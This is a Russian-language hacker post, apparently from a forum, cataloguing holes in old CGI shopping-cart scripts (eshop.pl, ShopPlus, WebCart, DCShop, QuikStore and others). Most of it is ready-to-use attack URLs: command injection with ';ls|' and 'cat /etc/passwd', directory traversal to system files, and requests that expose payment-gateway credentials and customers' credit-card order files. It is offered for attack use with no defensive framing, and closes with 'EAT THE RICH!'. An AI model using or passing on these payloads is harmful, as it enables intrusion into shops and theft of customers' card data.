Уязвимости торговых площадок

Продолжаем наше изучение багов популярных в недалеком прошлом торговых тележках.
В этот раз мы в начале расмотрим тележки которые позволяли выполнять произвольные команды, а после и другие вкусности.

№ 1-м у нас пойдет (e)shop Online-Shop System от Webdiscount.net

скрипт не фильтрует символы конвеера(;) и пейапа (|):
www.xxx.com/cgi-bin/eshop.pl?seite=;ls|

№ 2 Hassan Consulting's Shoping cart [shop.cgi]от Hassan Consulting.

то же самое:
www.xxx.com/cgi-local/shop.pl/page=|ls|
www.xxx.com/cgi-local/shop.pl/page=;ls|

к сожалению в версиях 4 и выше Hassan Consulting's Shoping cart этот баг уже отсутсвует, но есть другая проблема, при запросе www.xxx.com/cgi-local/shop.pl можно узнать версию торговой тележки и путь до скрипта.

№ 3 ShopPlus Cart

то же самое, отсутсвует проверка на вводимые символы:
www.xxx.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
www.xxx.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

№ 4 multi-shop 1.06

Вместо template файла можно указать любую команду.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf&user_notebooks=note_envoy

№ 5 WebCart от Mountain Network Systems

выполняем удаленные команды:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD

Далее расматриваем другие уязвимости

№ 6 Dansie Shopping Cart 3.04 Multiple Vulnerabilities

Добавление в конец определенных переменных и значений к http://target/cgi-bin/cart.pl?
позволит отдаленным пользователям исполнять некоторые действия. "Vars" отобразит параметры
настройки конфигурации приложения, которое включает имя пользователя и пароль, используемый
для сделок кредитной карточки. Параметры настройки Окружающей среды могут быть получены,
используя "env".
Строка "db" перечислит полный файл базы данных, содержащий все предметы в shopping cart.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db

№ 7 ShopCartCGI v 2.3

изъян позволяет удаленному пользователю просматривать файлы на сервере:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd

№ 8 QuikStore Shopping Cart

Удаленный пользователь может просматривать файлы на системе:
www.xxx.com/quikstore.cgi?blah&template=../../. ./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
www.xxx.com/quikstore.cgi?blah&t emplate=../../../../../../../../../../../../usr/bin/id|

№ 9 DCShop Electronic Shopping Cart

Целый набор багов:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - информация о кредитках в старых версиях тележки просматривалась так.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - выдает инфу о кредитках в некоторых новых версиях.

Твой bug Durito.
_________________
EAT THE RICH!